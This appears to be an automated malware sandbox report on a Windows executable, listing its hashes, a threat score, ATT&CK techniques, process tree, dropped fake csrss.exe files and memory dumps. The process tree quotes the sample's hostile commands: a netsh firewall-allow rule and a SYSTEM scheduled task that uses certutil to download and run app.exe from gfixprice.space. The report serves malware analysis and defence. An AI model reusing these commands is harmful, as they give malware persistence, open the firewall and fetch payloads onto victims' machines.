6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195

General

Target

6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe
Size

3.9MB
MD5

845ea5e600e1106dad9d929650cda38d
SHA1

790a0fdb2fba67ea44823ecf8ba2eb45203fb781
SHA256

6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195
SHA512

8d60a50a1be2caf13602d26c27610848dc0110824b4ba354e7fdd25d01ab76dee3df8882393a384a92bc6adf80be733586040eca2781eaf01ec1b897a450a778

Score

8^/10

evasion

Malware Config

Signatures

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1044 schtasks.exe
1052 schtasks.exe

pid	process
1044	schtasks.exe
1052	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe
"C:\Users\Admin\AppData\Local\Temp\6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe"
1⤵
PID:1368

C:\Users\Admin\AppData\Local\Temp\6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe
"C:\Users\Admin\AppData\Local\Temp\6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe"
2⤵
PID:872

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
3⤵
PID:1372

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe ""
3⤵
PID:1452

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
4⤵
- Creates scheduled task(s)
PID:1044

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
4⤵
- Creates scheduled task(s)
PID:1052

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220524235939.log C:\Windows\Logs\CBS\CbsPersist_20220524235939.cab
1⤵
PID:676

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
1⤵
PID:1704

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Modify Existing Service

Scheduled Task

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\rss\csrss.exe
Filesize
1.6MB

MD5
4459c7b88182486ebe732cd0e93dcfdc

SHA1
cd0cd64339f55797ac56a83e2074d5730ce348ee

SHA256
6cced2fd968036ec8412fa7fb1deca97503c1f485f0861f27941c5ed0397caba

SHA512
9b3beb248ea34748f502aa4aeaf73dd9fb67506e283d18e3c123e7b3af5863e9ed55efc63f71d1361e7304b4bb7e62a0f080510c47fa9783bd2449b187bfe30f

Download Submit
\Windows\rss\csrss.exe
Filesize
2.0MB

MD5
2bbd0b035ca3a6131a3d018ba006424e

SHA1
712784283df6606a0a61323e32ed83e67ea072d7

SHA256
42039ff14a5c11261df67b514941ab70f6cfb8e202032936f169e21c3c959a92

SHA512
9a3497bc583dfba13b0b52bcbdc658ff09cd135ecaba0cc90307c79fbba8da6244c6c06e26413cf08f6be6f4194aabe257424841faf582b3174e6fbe077a2779

Download Submit
\Windows\rss\csrss.exe
Filesize
1.9MB

MD5
991e26e1c758140eb9020ea0f10223a3

SHA1
81024aec63dbbaa17072e73c17b53b8a35f14578

SHA256
9046440d9a2e0a8d3e5e3b2293162bda5568e920388c80099637d33c5c0216ca

SHA512
5030d66feee2830b0c64bb9be4473a33ef9b74a84762cf6b25b8c8c310a96e1f0a123c633ecbc5a0d43d5561e15c113c8577807bf466f228088a1f1b1161d3a7

Download Submit
memory/872-58-0x0000000002620000-0x00000000029C7000-memory.dmp

Filesize
3.7MB

Download
memory/872-62-0x0000000002620000-0x00000000029C7000-memory.dmp

Filesize
3.7MB

Download
memory/872-63-0x0000000000400000-0x0000000000D2D000-memory.dmp

Filesize
9.2MB

Download
memory/1368-57-0x0000000000400000-0x0000000000D2D000-memory.dmp

Filesize
9.2MB

Download
memory/1368-55-0x0000000002560000-0x0000000002907000-memory.dmp

Filesize
3.7MB

Download
memory/1368-56-0x0000000002910000-0x0000000003006000-memory.dmp

Filesize
7.0MB

Download
memory/1368-54-0x0000000002560000-0x0000000002907000-memory.dmp

Filesize
3.7MB

Download
memory/1372-59-0x0000000000000000-mapping.dmp

Download
memory/1452-66-0x0000000000000000-mapping.dmp

Download
memory/1452-68-0x0000000002720000-0x0000000002AC7000-memory.dmp

Filesize
3.7MB

Download
memory/1452-69-0x0000000002720000-0x0000000002AC7000-memory.dmp

Filesize
3.7MB

Download
memory/1452-70-0x0000000002AD0000-0x00000000031C6000-memory.dmp

Filesize
7.0MB

Download
memory/1452-71-0x0000000000400000-0x0000000000D2D000-memory.dmp

Filesize
9.2MB

Download
memory/1704-61-0x000007FEFBD41000-0x000007FEFBD43000-memory.dmp

Filesize
8KB

Download
memory/1704-60-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads